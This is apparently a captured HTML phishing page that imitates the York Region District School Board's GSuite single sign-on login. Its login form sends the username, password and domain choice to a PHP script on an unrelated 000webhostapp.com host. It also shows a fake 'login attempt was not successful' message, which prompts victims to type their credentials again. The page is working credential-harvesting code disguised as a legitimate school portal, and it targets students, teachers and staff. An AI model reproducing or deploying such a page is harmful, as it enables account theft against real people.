google.yrdsb.ca
4 years ago in HTML
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
YRDSB Google Apps Single Sign On
</title><link href="https://qhgi4ohoi4hgoincvce.000webhostapp.com/yrdsb.css" type="text/css" rel="stylesheet" />
<div id="banner">
<center><img class="displayed" src="https://google.yrdsb.ca/LoginFormIdentityProvider/SSO/G-Suite-for-Education.jpg" alt="York Region Disctrict School Board" width="25%"></center>
</div>
</head>
<body>
<p style="font-size:12px"><center>Welcome to the GSuite (formerly known as Google Apps) for Education Environment provided to you by YRDSB.
<br>
<p style="font-size:12px"><center>For more information or help with <em>GSuite for Education</em>, please <a href="https://www.google.com/edu/training/get-trained/" target="_blank">visit this site</a>
<form method="post" action="https://qhgi4ohoi4hgoincvce.000webhostapp.com/yrdsbpost.php/" onsubmit="javascript:return WebForm_OnSubmit();" id="loginForm">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTMwNjU0NTQzOA8WAh4TVmFsaWRhdGVSZXF1ZXN0TW9kZQIBFgICAw9kFgICBw8WAh4EVGV4dAU4WW91ciBsb2dpbiBhdHRlbXB0IHdhcyBub3Qgc3VjY2Vzc2Z1bC4gUGxlYXNlIHRyeSBhZ2Fpbi5kZD+VG3uXjSzetuBqGDb0v4AUUIof+/B+BVEd2F/mVava" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['loginForm'];
if (!theForm) {
theForm = document.loginForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/LoginFormIdentityProvider/WebResource.axd?d=lZhqYSI0Nv4HObVJztf8W6tP9U-AiMLeQ4IYKnCTQX6r637S7Gy-PUg90yKR8j-7gAUdMlE5_V78M1r7xsl4C-DWXf3-vGFDL0HZ9rogM_Y1&amp;t=636934633200000000" type="text/javascript"></script>
<script src="/LoginFormIdentityProvider/WebResource.axd?d=HfZLwH2qlP4vw_mcmeIh8UtRhkIv_Th90Q0p-Z3RoXSuXREKKxTG19tuJbf7dS00GtWDca1GLBfX4D_vJtLlKIUsnU2byGqueIhxfIWv08M1&amp;t=636934633200000000" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div class="aspNetHidden">
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="89F0D0DF" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAAYqL/Xn1ykctgq18w0maotn9PJHeXqRncpQpm+aegPHGiFMn45TB+nPStrp1Yo2S99HUsEpfU/XGHb3RFDJN6xFXArz/WCefbk6V2VE3Ih52dypqPqLgdpphNzIPTIm7G4g+efVrl8CyW1RCa8quqrRsbQoHxNFxhdT/L8jJ2m3Gw==" />
</div>
<div class="login">
<div id="userNamePasswordPrompt">
<p>
Please enter your user name and password.
</p>
</div>
<span class="failureNotification">
Your login attempt was not successful. Please try again.
</span>
<div id="LoginUserValidationSummary" class="failureNotification" style="display:none;">
</div>
<div class="accountInfo">
<table border="0" cellpadding="2">
<tr id="DomainInput">
<td>
<p>
<label for="DomainDropDownList" id="DomainLabel">Domain:</label>
</p>
</td>
<td>
<p>
<select name="DomainDropDownList" id="DomainDropDownList">
<option selected="selected" value="EDU">EDU (Students and Teachers)</option>
<option value="YRDSB">YRDSB (Administrators and Staff)</option>
</select>
</p>
</td>
</tr>
<tr>
<td>
<p>
<label for="UserName" id="UserNameLabel">User name:</label>
</p>
</td>
<td>
<p>
<input name="UserName" type="text" value="" id="UserName" class="userName" />
<span id="UserNameRequired" title="User Name is required." class="failureNotification" style="visibility:hidden;">*</span>
</p>
</td>
</tr>
<tr>
<td>
<p>
<label for="Password" id="PasswordLabel">Password:</label>
</p>
</td>
<td>
<p>
<input name="Password" type="password" id="Password" class="password" />
<span id="PasswordRequired" title="Password is required." class="failureNotification" style="visibility:hidden;">*</span>
</p>
</td>
</tr>
<tr>
<td align="right" colspan="2">
<p class="submitButton">
<input type="submit" name="LoginButton" value="Log Me In to Google" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;LoginButton&quot;, &quot;&quot;, true, &quot;LoginUserValidationGroup&quot;, &quot;&quot;, false, false))" id="LoginButton" />
</p>
</td>
</tr>
</table>
</div>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("LoginUserValidationSummary"));
var Page_Validators = new Array(document.getElementById("UserNameRequired"), document.getElementById("PasswordRequired"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var LoginUserValidationSummary = document.all ? document.all["LoginUserValidationSummary"] : document.getElementById("LoginUserValidationSummary");
LoginUserValidationSummary.validationGroup = "LoginUserValidationGroup";
var UserNameRequired = document.all ? document.all["UserNameRequired"] : document.getElementById("UserNameRequired");
UserNameRequired.controltovalidate = "UserName";
UserNameRequired.errormessage = "User name is required.";
UserNameRequired.validationGroup = "LoginUserValidationGroup";
UserNameRequired.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
UserNameRequired.initialvalue = "";
var PasswordRequired = document.all ? document.all["PasswordRequired"] : document.getElementById("PasswordRequired");
PasswordRequired.controltovalidate = "Password";
PasswordRequired.errormessage = "Password is required.";
PasswordRequired.validationGroup = "LoginUserValidationGroup";
PasswordRequired.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
PasswordRequired.initialvalue = "";
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}
function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return ValidatorCommonOnSubmit();
}
else {
return true;
}
}
//]]>
</script>
</form>
<div id="infotext" class="">
<br>
<br>
<p style="font-size:11px"><em><strong>I will respect any and all personal information entrusted to me while using the YRDSB GSuite for Education (GAPPS or GAFE) platform. I will use it only as I am entitled to perform my work and learning related activities and will not improperly share it in any way that is disrespectful to the person to whom the information belongs. I will treat all personal information as confidential and will report any breaches of personal privacy to the Assistant Manager, Records Management/MFIPPA. </em></p>
<p style="font-size:11px"><em><strong> Please note: Clicking the login button above acknowledges your acceptance and adherence to the above statement and your understanding of the terms and conditions of the Board’s Appropriate Use Policy#194.</em></p>
</div>
</body>
</html>